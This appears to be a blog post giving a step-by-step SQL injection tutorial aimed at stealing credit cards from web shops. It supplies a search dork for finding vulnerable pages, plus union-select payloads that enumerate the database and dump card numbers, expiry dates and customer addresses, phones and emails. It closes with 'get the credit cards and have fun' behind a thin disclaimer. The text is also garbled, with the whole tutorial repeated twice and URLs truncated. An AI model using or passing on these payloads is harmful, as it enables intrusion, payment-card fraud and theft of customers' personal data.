SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker)..This is new Tutorial.by me for hacking CC
Note:-Everything Written Is Here Only For Educational Purpose…If You Do Any Illegal Activity…We are Not Responsible For That.
1) we got to search google for webshops , I used this dork :
Code:
inurl:customer_testimonials.php testimonial_id=
2)lets say we got this site
Code:
http://www.JustExample.com/customer_…stimonial_id=7
3) we got to check if its vulnerable to SQLi , we add this
Code:
‘
to url :
>>>
Code:
http://www.JustExample.com/customer_…stimonial_id=7‘
if we get a error means website its vuln.
4) we have to check for column number we try with 10 first
Code:
+order+by+10-
– :
>>>
Code:
http://www.JustExample.com/customer_…+order+by+10–
if we dont get a error means the website has more then 10 columns , if we get a error means the website has less then 10 columns
5 )this time we get a error now we try from 1 to 9
Code:
+union+select+1,2,3,4,5,6,7,8,9–
>>>
Code:
http://www.JustExample.com/customer_…,4,5,6,7,8,9–
now we found it the website has 9 columns
6) most of time we can get infos from table 3 and 6 , lets say now we can from 3 xD , now we can get database user , database name and database version in this way :
*- database user
Code:
http://www.JustExample.com/customer_…,4,5,6,7,8,9–
*- database name
Code:
http://www.JustExample.com/customer_…,4,5,6,7,8,9–
*- database version
Code:
http://www.JustExample.com/customer_…,4,5,6,7,8,9–
7) we need the table names we add this to url :
Code:
+union+select+1,2,table_name,4,5,6,7,8,9+from+info rmation_schema.tables–
Code:
http://www.JustExample.com/customer_…chema.tables–
now we need columns : we add this to url :
Code:
+union+select+1,2,concat(table_name,char(58),colum n_name),4,5,6,7,8,9+from+information_schema.column s–
>>>
Code:
http://www.JustExample.com/customer_…hema.columns–
9) now all we got to do is view the orders and customers infos (there are the credit cards xD) : if we add this to url we will get credit card numbers , payment method , credit card type ……
Code:
+union+select+1,2,concat(payment_method,char(58),c c_type,char(58),cc_number,char(58),cc_expires),4,5 ,6,7,8,9fromorders–
>>>
Code:
http://www.JustExample.com/customer_…+from+orders–
if we add this to url we will get many infos about costumers , address , phone number , e-mails , zip code , and the credit card infos all of them
Code:
+union+select+1,2,concat(orders_id,0x2F,cc_type,0x 2F,cc_owner,0x2F,cc_number,0x2F,cc_expires,0x2F,cu stomers_street_address,0x2F,customers_suburb,0x2F, customers_city,0x2F,customers_postcode,0x2F,custom ers_state,0x2F,customers_country,0x2F,customers_te lephone,0x2F,customers_email_address,0x2F,date_pur chased),4,5,6,7,8,9+from+orders+
>>>
Code:
Welcome! Future Home of Another Amazing Website Powered by Exabytes
/customer_testimonials.php?&testimonial_id=7+union+ select+1,2,concat(orders_id,0x2F,cc_type,0x2F,cc_o wner,0x2F,cc_number,0x2F,cc_expires,0x2F,customers _street_address,0x2F,customers_suburb,0x2F,custome rs_city,0x2F,customers_postcode,0x2F,customers_sta te,0x2F,customers_country,0x2F,customers_telephone ,0x2F,customers_email_address,0x2F,date_purchased) ,4,5,6,7,8,9+from+orders+
now one step left
10 ) get the credit cards and have fun….
Don’t forget to use your brain……
ENJOY !!!!
Code:
inurl:customer_testimonials.php testimonial_id=
2)lets say we got this site
Code:
http://www.JustExample.com/customer_…stimonial_id=7
3) we got to check if its vulnerable to SQLi , we add this
Code:
‘
to url :
>>>
Code:
http://www.JustExample.com/customer_…stimonial_id=7‘
if we get a error means website its vuln.
4) we have to check for column number we try with 10 first
Code:
+order+by+10-
– :
>>>
Code:
http://www.JustExample.com/customer_…+order+by+10–
if we dont get a error means the website has more then 10 columns , if we get a error means the website has less then 10 columns
5 )this time we get a error now we try from 1 to 9
Code:
+union+select+1,2,3,4,5,6,7,8,9–
>>>
Code:
http://www.JustExample.com/customer_…,4,5,6,7,8,9–
now we found it the website has 9 columns
6) most of time we can get infos from table 3 and 6 , lets say now we can from 3 xD , now we can get database user , database name and database version in this way :
*- database user
Code:
http://www.JustExample.com/customer_…,4,5,6,7,8,9–
*- database name
Code:
http://www.JustExample.com/customer_…,4,5,6,7,8,9–
*- database version
Code:
http://www.JustExample.com/customer_…,4,5,6,7,8,9–
7) we need the table names we add this to url :
Code:
+union+select+1,2,table_name,4,5,6,7,8,9+from+info rmation_schema.tables–
Code:
http://www.JustExample.com/customer_…chema.tables–
now we need columns : we add this to url :
Code:
+union+select+1,2,concat(table_name,char(58),colum n_name),4,5,6,7,8,9+from+information_schema.column s–
>>>
Code:
http://www.JustExample.com/customer_…hema.columns–
9) now all we got to do is view the orders and customers infos (there are the credit cards xD) : if we add this to url we will get credit card numbers , payment method , credit card type ……
Code:
+union+select+1,2,concat(payment_method,char(58),c c_type,char(58),cc_number,char(58),cc_expires),4,5 ,6,7,8,9fromorders–
>>>
Code:
http://www.JustExample.com/customer_…+from+orders–
if we add this to url we will get many infos about costumers , address , phone number , e-mails , zip code , and the credit card infos all of them
Code:
+union+select+1,2,concat(orders_id,0x2F,cc_type,0x 2F,cc_owner,0x2F,cc_number,0x2F,cc_expires,0x2F,cu stomers_street_address,0x2F,customers_suburb,0x2F, customers_city,0x2F,customers_postcode,0x2F,custom ers_state,0x2F,customers_country,0x2F,customers_te lephone,0x2F,customers_email_address,0x2F,date_pur chased),4,5,6,7,8,9+from+orders+
>>>
Code:
Welcome! Future Home of Another Amazing Website Powered by Exabytes
/customer_testimonials.php?&testimonial_id=7+union+ select+1,2,concat(orders_id,0x2F,cc_type,0x2F,cc_o wner,0x2F,cc_number,0x2F,cc_expires,0x2F,customers _street_address,0x2F,customers_suburb,0x2F,custome rs_city,0x2F,customers_postcode,0x2F,customers_sta te,0x2F,customers_country,0x2F,customers_telephone ,0x2F,customers_email_address,0x2F,date_purchased) ,4,5,6,7,8,9+from+orders+
now one step left
10 ) get the credit cards and have fun….
Don’t forget to use your brain……
ENJOY !!!!
No comments:
Post a Comment